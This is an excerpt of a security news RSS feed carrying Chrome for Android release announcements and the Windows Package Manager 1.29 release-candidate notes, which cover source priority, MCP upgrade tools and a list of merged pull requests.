<link>https://tsecurity.de/de/3605372/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605372/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Wed, 17 Jun 2026 17:55:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 150 (150.0.7871.28) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.13..150.0.7871.28?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D150">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[Hi, everyone! We've just released Chrome 149 (149.0.7827.159) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know...]]></description>
<link>https://tsecurity.de/de/3603444/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603444/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Wed, 17 Jun 2026 03:49:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi, everyone! We've just released <b>Chrome 149 (149.0.7827.159)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.114..149.0.7827.159?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_01750511403.html"> Desktop releases</a> (Windows &amp; Mac: 149.0.7827.155/156, Linux: 149.0.7872.155) unless otherwise noted.</div><div><div><br></div><div><div>Harry Souders</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.29.240]]></title>
<description><![CDATA[This is a release candidate of Windows Package Manager v1.29. If you find any bugs or problems, please help us out by filing an issue.
Note: This version is not fully localized yet. Localized strings will be included in a future build before stable release.
New in v1.29
New Feature: Source Priori...]]></description>
<link>https://tsecurity.de/de/3601252/downloads/windows-package-manager-129240/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601252/downloads/windows-package-manager-129240/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:46 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a release candidate of Windows Package Manager v1.29. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<p>Note: This version is not fully localized yet. Localized strings will be included in a future build before stable release.</p>
<h2>New in v1.29</h2>
<h1>New Feature: Source Priority</h1>
<div class="markdown-alert markdown-alert-note"><p class="markdown-alert-title"><svg data-component="Octicon" class="octicon octicon-info mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8Zm8-6.5a6.5 6.5 0 1 0 0 13 6.5 6.5 0 0 0 0-13ZM6.5 7.75A.75.75 0 0 1 7.25 7h1a.75.75 0 0 1 .75.75v2.75h.25a.75.75 0 0 1 0 1.5h-2a.75.75 0 0 1 0-1.5h.25v-2h-.25a.75.75 0 0 1-.75-.75ZM8 6a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg>Note</p><p>Experimental under <code>sourcePriority</code>; defaulted to disabled.</p>
</div>
<p>With this feature, one can assign a numerical priority to sources when added or later through the <code>source edit</code><br>
command. Sources with higher priority are sorted first in the list of sources, which results in them getting put first<br>
in the results if other things are equal.</p>
<div class="markdown-alert markdown-alert-tip"><p class="markdown-alert-title"><svg data-component="Octicon" class="octicon octicon-light-bulb mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M8 1.5c-2.363 0-4 1.69-4 3.75 0 .984.424 1.625.984 2.304l.214.253c.223.264.47.556.673.848.284.411.537.896.621 1.49a.75.75 0 0 1-1.484.211c-.04-.282-.163-.547-.37-.847a8.456 8.456 0 0 0-.542-.68c-.084-.1-.173-.205-.268-.32C3.201 7.75 2.5 6.766 2.5 5.25 2.5 2.31 4.863 0 8 0s5.5 2.31 5.5 5.25c0 1.516-.701 2.5-1.328 3.259-.095.115-.184.22-.268.319-.207.245-.383.453-.541.681-.208.3-.33.565-.37.847a.751.751 0 0 1-1.485-.212c.084-.593.337-1.078.621-1.489.203-.292.45-.584.673-.848.075-.088.147-.173.213-.253.561-.679.985-1.32.985-2.304 0-2.06-1.637-3.75-4-3.75ZM5.75 12h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM6 15.25a.75.75 0 0 1 .75-.75h2.5a.75.75 0 0 1 0 1.5h-2.5a.75.75 0 0 1-.75-.75Z"></path></svg>Tip</p><p>Search result ordering in winget is currently based on these values in this order:</p>
<ol>
<li>Match quality (how well a valid field matches the search request)</li>
<li>Match field (which field was matched against the search request)</li>
<li>Source order (was always relevant, but with priority you can more easily affect this)</li>
</ol>
</div>
<p>Beyond the ability to slightly affect the result ordering, commands that primarily target available packages<br>
(largely <code>install</code>) will now prefer to use a single result from a source with higher priority rather than prompting for<br>
disambiguation from the user. Said another way, if multiple sources return results but only one of those sources has<br>
the highest priority value (and it returned only one result) then that package will be used rather than giving a<br>
"multiple packages were found" error. This has been applied to both winget CLI and PowerShell module commands.</p>
<h3>REST result match criteria update</h3>
<p>Along with the source priority change, the results from REST sources (like <code>msstore</code>) now attempt to correctly set the<br>
match criteria that factor into the result ordering. This will prevent them from being sorted to the top automatically.</p>
<h2>Minor Features</h2>
<h3>Preserve installer arguments across export and import</h3>
<p><code>winget export</code> now captures the <code>--override</code> and <code>--custom</code> arguments that were used when a package was originally installed and saves them into the export file. When subsequently running <code>winget import</code>, those values are automatically re-applied during installation — <code>--override</code> replaces all installer arguments and <code>--custom</code> appends extra switches — so packages can be reinstalled with the same customizations without any manual intervention. Both fields are optional and independent of each other; packages without stored installer arguments are unaffected.</p>
<h3>--no-progress flag</h3>
<p>Added a new <code>--no-progress</code> command-line flag that disables all progress reporting (progress bars and spinners). This flag is universally available on all commands and takes precedence over the <code>visual.progressBar</code> setting. Useful for automation scenarios or when running WinGet in environments where progress output is undesirable.</p>
<h3>MCP <code>upgrade</code> support</h3>
<p>The WinGet MCP server's existing tools have been extended with new parameters to support upgrade scenarios:</p>
<ul>
<li><strong><code>find-winget-packages</code></strong> now accepts an <code>upgradeable</code> parameter (default: <code>false</code>). When set to <code>true</code>, it lists only installed packages that have available upgrades — equivalent to <code>winget upgrade</code>. The <code>query</code> parameter becomes optional in this mode, allowing it to filter results or be omitted to list all upgradeable packages. AI agents can use this to answer requests like "What apps can I update with WinGet?"</li>
<li><strong><code>install-winget-package</code></strong> now accepts an <code>upgradeOnly</code> parameter (default: <code>false</code>). When set to <code>true</code>, it only upgrades an already-installed package and returns a clear error if the package is not installed (pointing to <code>install-winget-package</code> without <code>upgradeOnly</code> instead). AI agents can use this to answer requests like "Update WinGetCreate" or, in combination with <code>find-winget-packages</code> with <code>upgradeable=true</code>, "Update all my apps."</li>
</ul>
<h3>Authenticated GitHub API requests in PowerShell module</h3>
<p>The PowerShell module now automatically uses <code>GH_TOKEN</code> or <code>GITHUB_TOKEN</code> environment variables to authenticate GitHub API requests. This significantly increases the GitHub API rate limit, preventing failures in CI/CD pipelines. Use <code>-Verbose</code> to see which token is being used.</p>
<h3>Default priority of installer types</h3>
<p>Installer type selection no longer depends on the order defined on the manifest. Instead, preference is given in this order:</p>
<ul>
<li>MSIX</li>
<li>MSI / Wix / Burn</li>
<li>Nullsoft / Inno / EXE</li>
<li>Portable</li>
</ul>
<p>When a user configures installer type requirements or preferences, the order in which they are listed is now respected during installer selection.</p>
<h3>Improved <code>list</code> output when redirected</h3>
<ul>
<li><code>winget list</code> (and similar table commands) no longer truncates output when stdout is redirected to a file or variable — column widths are now computed from the full result set.</li>
<li>Spinner and progress bar output are suppressed when no console is attached, keeping redirected output clean.</li>
</ul>
<h3>Log file naming strategy</h3>
<p>Added a user setting (<code>logging.fileNameStrategy</code>) for controlling the default naming strategy for installer log files. Supported values are <code>manifest</code> (default), <code>timestamp</code>, <code>guid</code>, and <code>shortguid</code>. Only applies to logs generated by installers if the installer itself supports the logging switch / parameter.</p>
<table>
<thead>
<tr>
<th>Setting</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>manifest</td>
<td>Uses the name of the manifest and a timestamp. Has the same behavior as WinGet 1.28</td>
</tr>
<tr>
<td>timestamp</td>
<td>The log name is just a timestamp</td>
</tr>
<tr>
<td>guid</td>
<td>The log name is a GUID</td>
</tr>
<tr>
<td>shortguid</td>
<td>The log name is the first 8 characters of a GUID</td>
</tr>
</tbody>
</table>
<h3>Sortable <code>list</code> output</h3>
<p><code>winget list</code> now supports sorting results via <code>--sort &lt;field&gt;</code> (repeatable for multi-field sorting), <code>--ascending</code>/<code>--descending</code> direction flags, and a persistent <code>output.sortOrder</code> setting. Available sort fields: <code>name</code>, <code>id</code>, <code>version</code>, <code>source</code>, <code>available</code>, <code>relevance</code>. By default, results are sorted alphabetically by name when no query is present; use <code>--sort relevance</code> to preserve the previous source-determined ordering.</p>
<h2>Bug Fixes</h2>
<ul>
<li><code>winget export</code> now works when the destination path is a hidden file</li>
<li>Fixed the <code>useLatest</code> property in the DSC v3 <code>Microsoft.WinGet/Package</code> resource schema to emit a boolean default (<code>false</code>) instead of the incorrect string <code>"false"</code>.</li>
<li><code>SignFile</code> in <code>WinGetSourceCreator</code> now supports an optional RFC 3161 timestamp server via the new <code>TimestampServer</code> property on the <code>Signature</code> model. When set, <code>signtool.exe</code> is called with <code>/tr &lt;url&gt; /td sha256</code>, embedding a countersignature timestamp so that signed packages remain valid after the signing certificate expires.</li>
<li>File and directory paths passed to <code>signtool.exe</code> and <code>makeappx.exe</code> are now quoted, fixing failures when paths contain spaces.</li>
<li>DSC export now correctly exports WinGet Admin Settings</li>
<li><code>winget validate</code> now performs case-insensitive comparison for file extensions where applicable</li>
<li><code>winget source reset</code> now properly resets default sources instead of removing them</li>
<li>DSC v3 <code>Microsoft.WinGet/Package</code> resource now honors the <code>installMode</code> property to use silent or interactive installer switches as specified</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Make list details stable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888464623" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6020" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6020/hovercard" href="https://github.com/microsoft/winget-cli/pull/6020">#6020</a></li>
<li>Move to IReference rather than custom enum for optional bool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892646118" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6022" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6022/hovercard" href="https://github.com/microsoft/winget-cli/pull/6022">#6022</a></li>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893629466" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6023" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6023/hovercard" href="https://github.com/microsoft/winget-cli/pull/6023">#6023</a></li>
<li>Bump version to 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888315257" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6019" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6019/hovercard" href="https://github.com/microsoft/winget-cli/pull/6019">#6019</a></li>
<li>Remove 'listDetails' from release notes for 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893739947" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6026" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6026/hovercard" href="https://github.com/microsoft/winget-cli/pull/6026">#6026</a></li>
<li>Update doc as WinGet is not in preview by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gijsreyn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gijsreyn">@Gijsreyn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572990820" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5850" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5850/hovercard" href="https://github.com/microsoft/winget-cli/pull/5850">#5850</a></li>
<li>Replaced "(C)" with "©" in the main menu. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DandelionSprout/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DandelionSprout">@DandelionSprout</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3571577317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5845" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5845/hovercard" href="https://github.com/microsoft/winget-cli/pull/5845">#5845</a></li>
<li>Source priority by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3897735089" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6029" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6029/hovercard" href="https://github.com/microsoft/winget-cli/pull/6029">#6029</a></li>
<li>Update json vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3917804123" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6039" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6039/hovercard" href="https://github.com/microsoft/winget-cli/pull/6039">#6039</a></li>
<li>Coalesce comments from loc suggestions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3908837169" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6033" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6033/hovercard" href="https://github.com/microsoft/winget-cli/pull/6033">#6033</a></li>
<li>Update Roadmap Milestones doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kissaki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kissaki">@Kissaki</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3543261404" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5824" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5824/hovercard" href="https://github.com/microsoft/winget-cli/pull/5824">#5824</a></li>
<li>Add copilot instructions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3939854896" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6048" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6048/hovercard" href="https://github.com/microsoft/winget-cli/pull/6048">#6048</a></li>
<li>Add --no-progress option by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3939862223" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6049" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6049/hovercard" href="https://github.com/microsoft/winget-cli/pull/6049">#6049</a></li>
<li>Remove Crescendo PowerShell by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3954834202" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6056" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6056/hovercard" href="https://github.com/microsoft/winget-cli/pull/6056">#6056</a></li>
<li>Fix casing of WinGet by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958871064" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6059" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6059/hovercard" href="https://github.com/microsoft/winget-cli/pull/6059">#6059</a></li>
<li>Added more info for "Installer Types" values in Settings.md. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DandelionSprout/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DandelionSprout">@DandelionSprout</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3984857044" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6067" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6067/hovercard" href="https://github.com/microsoft/winget-cli/pull/6067">#6067</a></li>
<li>Diagnostics update and stable DSC for tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048008456" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6084" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6084/hovercard" href="https://github.com/microsoft/winget-cli/pull/6084">#6084</a></li>
<li>feat: authenticate GitHub API requests using GH_TOKEN/GITHUB_TOKEN by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wmmc88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wmmc88">@wmmc88</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3997110317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6071" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6071/hovercard" href="https://github.com/microsoft/winget-cli/pull/6071">#6071</a></li>
<li>Tool to investigate SQLite compression by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023664222" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6074" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6074/hovercard" href="https://github.com/microsoft/winget-cli/pull/6074">#6074</a></li>
<li>Add dependencies only option by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992749991" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6069" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6069/hovercard" href="https://github.com/microsoft/winget-cli/pull/6069">#6069</a></li>
<li>docs: fix multiple documentation issues (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915720169" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5296" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5296/hovercard" href="https://github.com/microsoft/winget-cli/issues/5296">#5296</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3720921587" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5921" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5921/hovercard" href="https://github.com/microsoft/winget-cli/issues/5921">#5921</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2769295431" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5108" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5108/hovercard" href="https://github.com/microsoft/winget-cli/issues/5108">#5108</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2238926257" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/4372" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/4372/hovercard" href="https://github.com/microsoft/winget-cli/issues/4372">#4372</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3612941602" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5867" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5867/hovercard" href="https://github.com/microsoft/winget-cli/issues/5867">#5867</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GrantMeStrength/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GrantMeStrength">@GrantMeStrength</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145157508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6110" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6110/hovercard" href="https://github.com/microsoft/winget-cli/pull/6110">#6110</a></li>
<li>Revert help link in DscCommand by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145628763" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6111" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6111/hovercard" href="https://github.com/microsoft/winget-cli/pull/6111">#6111</a></li>
<li>Update Moq, curl, and c-ares by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147531770" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6112" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6112/hovercard" href="https://github.com/microsoft/winget-cli/pull/6112">#6112</a></li>
<li>Add Timeserver Support for SourceCreator and support spaces in paths and file names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148852287" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6113" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6113/hovercard" href="https://github.com/microsoft/winget-cli/pull/6113">#6113</a></li>
<li>Report skipped upgrades when install technology differs (upgrade --all) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AMDphreak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AMDphreak">@AMDphreak</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111928053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6096" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6096/hovercard" href="https://github.com/microsoft/winget-cli/pull/6096">#6096</a></li>
<li>[AI Generated] Ensure correct DSC export of admin settings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140482006" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6109" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6109/hovercard" href="https://github.com/microsoft/winget-cli/pull/6109">#6109</a></li>
<li>Update default for useLatest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148917499" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6114" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6114/hovercard" href="https://github.com/microsoft/winget-cli/pull/6114">#6114</a></li>
<li>Add Update commands for MCP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4172268285" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6117" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6117/hovercard" href="https://github.com/microsoft/winget-cli/pull/6117">#6117</a></li>
<li>Preserve overrides with export and import by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173119239" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6118" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6118/hovercard" href="https://github.com/microsoft/winget-cli/pull/6118">#6118</a></li>
<li>Quote winget server path before calling CreateProcess by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190755267" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6122" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6122/hovercard" href="https://github.com/microsoft/winget-cli/pull/6122">#6122</a></li>
